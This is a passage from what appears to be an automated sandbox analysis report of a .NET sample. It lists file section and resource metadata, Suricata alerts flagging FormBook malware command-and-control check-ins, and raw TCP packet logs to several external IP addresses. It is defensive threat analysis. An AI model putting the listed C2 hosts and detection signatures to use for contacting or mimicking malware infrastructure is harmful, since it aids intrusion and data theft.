                                                                                                                      .reloc0xbc0000xc0x200b6f705f12f7b0a123e886d2fd2fbf637False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_VERSION0xba0900x394OpenPGP Secret Key0.4192139737991266
                                                                                                                      RT_MANIFEST0xba4340x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                      Network Behavior

                                                                                                                      Suricata IDS Alerts

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-11-01T09:17:16.126422+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449735TCP
                                                                                                                      2024-11-01T09:17:45.079358+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.462632TCP
                                                                                                                      2024-11-01T09:17:52.985977+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4626333.33.130.19080TCP
                                                                                                                      2024-11-01T09:17:52.985977+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4626333.33.130.19080TCP
                                                                                                                      2024-11-01T09:18:08.753198+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462694172.67.131.3280TCP
                                                                                                                      2024-11-01T09:18:11.271335+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462710172.67.131.3280TCP
                                                                                                                      2024-11-01T09:18:13.849533+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462726172.67.131.3280TCP
                                                                                                                      2024-11-01T09:18:16.416013+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462737172.67.131.3280TCP
                                                                                                                      2024-11-01T09:18:16.416013+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462737172.67.131.3280TCP
                                                                                                                      2024-11-01T09:18:23.679834+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462773103.191.208.13780TCP
                                                                                                                      2024-11-01T09:18:26.278057+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462789103.191.208.13780TCP
                                                                                                                      2024-11-01T09:18:28.819040+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462805103.191.208.13780TCP
                                                                                                                      2024-11-01T09:18:31.975253+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462821103.191.208.13780TCP
                                                                                                                      2024-11-01T09:18:31.975253+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462821103.191.208.13780TCP
                                                                                                                      2024-11-01T09:18:46.803393+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4629033.33.130.19080TCP
                                                                                                                      2024-11-01T09:18:48.488897+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4629083.33.130.19080TCP
                                                                                                                      2024-11-01T09:18:51.052223+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4629093.33.130.19080TCP
                                                                                                                      2024-11-01T09:18:54.500417+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4629103.33.130.19080TCP
                                                                                                                      2024-11-01T09:18:54.500417+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4629103.33.130.19080TCP
                                                                                                                      2024-11-01T09:19:00.170351+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4629113.33.130.19080TCP
                                                                                                                      2024-11-01T09:19:02.751946+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4629123.33.130.19080TCP
                                                                                                                      2024-11-01T09:19:05.308699+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4629133.33.130.19080TCP
                                                                                                                      2024-11-01T09:19:10.801113+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4629143.33.130.19080TCP
                                                                                                                      2024-11-01T09:19:10.801113+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4629143.33.130.19080TCP
                                                                                                                      2024-11-01T09:19:17.040909+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46291538.47.232.16080TCP
                                                                                                                      2024-11-01T09:19:19.710329+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46291638.47.232.16080TCP
                                                                                                                      2024-11-01T09:19:22.334592+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46291738.47.232.16080TCP
                                                                                                                      2024-11-01T09:19:25.033196+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.46291838.47.232.16080TCP
                                                                                                                      2024-11-01T09:19:25.033196+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.46291838.47.232.16080TCP
                                                                                                                      2024-11-01T09:19:32.600217+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46291934.92.109.13180TCP
                                                                                                                      2024-11-01T09:19:35.240845+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46292034.92.109.13180TCP
                                                                                                                      2024-11-01T09:19:37.693971+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.46292134.92.109.13180TCP
                                                                                                                      2024-11-01T09:19:40.303371+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.46292234.92.109.13180TCP
                                                                                                                      2024-11-01T09:19:40.303371+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.46292234.92.109.13180TCP
                                                                                                                      2024-11-01T09:19:46.130370+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462923162.0.211.14380TCP
                                                                                                                      2024-11-01T09:19:48.691019+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462924162.0.211.14380TCP
                                                                                                                      2024-11-01T09:19:51.325066+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462925162.0.211.14380TCP
                                                                                                                      2024-11-01T09:19:53.887832+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462926162.0.211.14380TCP
                                                                                                                      2024-11-01T09:19:53.887832+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462926162.0.211.14380TCP
                                                                                                                      2024-11-01T09:19:59.940856+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462927195.110.124.13380TCP
                                                                                                                      2024-11-01T09:20:02.478341+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462928195.110.124.13380TCP
                                                                                                                      2024-11-01T09:20:05.087084+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462929195.110.124.13380TCP
                                                                                                                      2024-11-01T09:20:07.678371+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462930195.110.124.13380TCP
                                                                                                                      2024-11-01T09:20:07.678371+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462930195.110.124.13380TCP
                                                                                                                      2024-11-01T09:20:13.788073+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462931185.68.16.9480TCP
                                                                                                                      2024-11-01T09:20:16.409534+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462932185.68.16.9480TCP
                                                                                                                      2024-11-01T09:20:18.868973+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462933185.68.16.9480TCP
                                                                                                                      2024-11-01T09:20:21.368464+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462934185.68.16.9480TCP
                                                                                                                      2024-11-01T09:20:21.368464+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462934185.68.16.9480TCP
                                                                                                                      2024-11-01T09:20:27.968512+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462935163.44.176.1280TCP
                                                                                                                      2024-11-01T09:20:30.492452+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462936163.44.176.1280TCP
                                                                                                                      2024-11-01T09:20:33.034157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462937163.44.176.1280TCP
                                                                                                                      2024-11-01T09:20:35.599498+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462938163.44.176.1280TCP
                                                                                                                      2024-11-01T09:20:35.599498+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462938163.44.176.1280TCP
                                                                                                                      2024-11-01T09:20:41.499262+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462939199.59.243.22780TCP
                                                                                                                      2024-11-01T09:20:44.002826+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462940199.59.243.22780TCP
                                                                                                                      2024-11-01T09:20:46.584377+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462941199.59.243.22780TCP
                                                                                                                      2024-11-01T09:20:49.147633+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462942199.59.243.22780TCP
                                                                                                                      2024-11-01T09:20:49.147633+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462942199.59.243.22780TCP
                                                                                                                      2024-11-01T09:20:56.334843+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462943103.233.82.5880TCP
                                                                                                                      2024-11-01T09:20:58.897359+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462944103.233.82.5880TCP
                                                                                                                      2024-11-01T09:21:02.477011+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462945103.233.82.5880TCP
                                                                                                                      2024-11-01T09:21:05.553474+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462946103.233.82.5880TCP
                                                                                                                      2024-11-01T09:21:05.553474+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462946103.233.82.5880TCP

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Nov 1, 2024 09:17:51.415107965 CET6263380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:17:51.420152903 CET80626333.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:17:51.420249939 CET6263380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:17:51.431792974 CET6263380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:17:51.436743975 CET80626333.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:17:52.985616922 CET80626333.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:17:52.985903978 CET80626333.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:17:52.985976934 CET6263380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:17:52.989237070 CET6263380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:17:52.994093895 CET80626333.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:08.046173096 CET6269480192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:08.051095963 CET8062694172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:08.051162004 CET6269480192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:08.061456919 CET6269480192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:08.066685915 CET8062694172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:08.753097057 CET8062694172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:08.753145933 CET8062694172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:08.753165007 CET8062694172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:08.753197908 CET6269480192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:08.754681110 CET8062694172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:08.754728079 CET6269480192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:09.569051027 CET6269480192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:10.587605953 CET6271080192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:10.592653036 CET8062710172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:10.592740059 CET6271080192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:10.603519917 CET6271080192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:10.608498096 CET8062710172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:11.271150112 CET8062710172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:11.271291018 CET8062710172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:11.271334887 CET6271080192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:11.274013996 CET8062710172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:11.274068117 CET6271080192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:12.116097927 CET6271080192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:13.134455919 CET6272680192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:13.139396906 CET8062726172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:13.139661074 CET6272680192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:13.150916100 CET6272680192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:13.156033993 CET8062726172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:13.156066895 CET8062726172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:13.156116962 CET8062726172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:13.156145096 CET8062726172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:13.156172037 CET8062726172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:13.156220913 CET8062726172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:13.156249046 CET8062726172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:13.156275988 CET8062726172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:13.156307936 CET8062726172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:13.849462986 CET8062726172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:13.849482059 CET8062726172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:13.849533081 CET6272680192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:14.662868023 CET6272680192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:15.715162992 CET6273780192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:15.720086098 CET8062737172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:15.720221996 CET6273780192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:15.765502930 CET6273780192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:15.770333052 CET8062737172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:16.414262056 CET8062737172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:16.415923119 CET8062737172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:16.416013002 CET6273780192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:16.417347908 CET6273780192.168.2.4172.67.131.32
                                                                                                                      Nov 1, 2024 09:18:16.422230005 CET8062737172.67.131.32192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:22.156455994 CET6277380192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:22.161706924 CET8062773103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:22.161813974 CET6277380192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:22.172318935 CET6277380192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:22.177459002 CET8062773103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:23.679833889 CET6277380192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:23.685168982 CET8062773103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:23.686899900 CET6277380192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:24.696469069 CET6278980192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:24.701529980 CET8062789103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:24.701630116 CET6278980192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:24.710556984 CET6278980192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:24.715404987 CET8062789103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:26.278057098 CET6278980192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:26.283814907 CET8062789103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:26.283899069 CET6278980192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:27.290708065 CET6280580192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:27.295783043 CET8062805103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:27.295958996 CET6280580192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:27.305403948 CET6280580192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:27.310542107 CET8062805103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:27.310556889 CET8062805103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:27.310574055 CET8062805103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:27.310581923 CET8062805103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:27.310589075 CET8062805103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:27.310596943 CET8062805103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:27.310628891 CET8062805103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:27.310637951 CET8062805103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:27.310645103 CET8062805103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:28.819040060 CET6280580192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:28.824857950 CET8062805103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:28.824913025 CET6280580192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:29.837681055 CET6282180192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:29.842513084 CET8062821103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:29.842617989 CET6282180192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:29.849773884 CET6282180192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:29.854736090 CET8062821103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:31.925614119 CET8062821103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:31.975253105 CET6282180192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:32.178270102 CET8062821103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:32.178397894 CET6282180192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:32.181979895 CET6282180192.168.2.4103.191.208.137
                                                                                                                      Nov 1, 2024 09:18:32.186737061 CET8062821103.191.208.137192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:45.280981064 CET6290380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:45.285737038 CET80629033.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:45.285792112 CET6290380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:45.297033072 CET6290380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:45.302198887 CET80629033.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:46.803392887 CET6290380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:46.810678959 CET80629033.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:46.810762882 CET6290380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:47.822735071 CET6290880192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:47.827531099 CET80629083.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:47.827591896 CET6290880192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:47.840290070 CET6290880192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:47.845093966 CET80629083.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:48.484260082 CET80629083.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:48.488897085 CET6290880192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:49.383450031 CET6290880192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:49.388283968 CET80629083.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:50.400886059 CET6290980192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:50.405765057 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:50.408993959 CET6290980192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:50.420914888 CET6290980192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:50.425812006 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:50.425823927 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:50.425832987 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:50.425843000 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:50.425909042 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:50.425918102 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:50.425947905 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:50.425956964 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:50.425987005 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:51.052109003 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:51.052222967 CET6290980192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:51.928400040 CET6290980192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:51.933284044 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:52.948890924 CET6291080192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:52.953991890 CET80629103.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:52.957072020 CET6291080192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:52.964891911 CET6291080192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:52.969878912 CET80629103.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:54.499588013 CET80629103.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:54.500185013 CET80629103.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:54.500416994 CET6291080192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:54.505040884 CET6291080192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:54.509808064 CET80629103.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:59.530373096 CET6291180192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:59.536154032 CET80629113.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:59.536217928 CET6291180192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:59.577398062 CET6291180192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:59.582214117 CET80629113.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:00.170298100 CET80629113.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:00.170351028 CET6291180192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:01.111423969 CET6291180192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:01.116297007 CET80629113.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:02.118617058 CET6291280192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:02.123553991 CET80629123.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:02.123734951 CET6291280192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:02.134051085 CET6291280192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:02.138969898 CET80629123.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:02.751804113 CET80629123.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:02.751945972 CET6291280192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:03.650130987 CET6291280192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:03.656512022 CET80629123.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.667897940 CET6291380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:04.672897100 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.673026085 CET6291380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:04.688930988 CET6291380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:04.693809032 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.693835974 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.693846941 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.693898916 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.698493004 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.698503971 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.698512077 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.698520899 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.698530912 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:05.308593035 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:05.308698893 CET6291380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:06.193968058 CET6291380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:06.198801041 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:07.214930058 CET6291480192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:07.219769955 CET80629143.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:07.220958948 CET6291480192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:07.227822065 CET6291480192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:07.232705116 CET80629143.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:10.800127029 CET80629143.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:10.800754070 CET80629143.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:10.801112890 CET6291480192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:10.803416967 CET6291480192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:10.808243990 CET80629143.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:15.987472057 CET6291580192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:15.992343903 CET806291538.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:15.992424965 CET6291580192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:16.003429890 CET6291580192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:16.008690119 CET806291538.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:16.992831945 CET806291538.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:17.040909052 CET6291580192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:17.200125933 CET806291538.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:17.200227976 CET6291580192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:17.506495953 CET6291580192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:18.551973104 CET6291680192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:18.556848049 CET806291638.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:18.556956053 CET6291680192.168.2.438.47.232.160
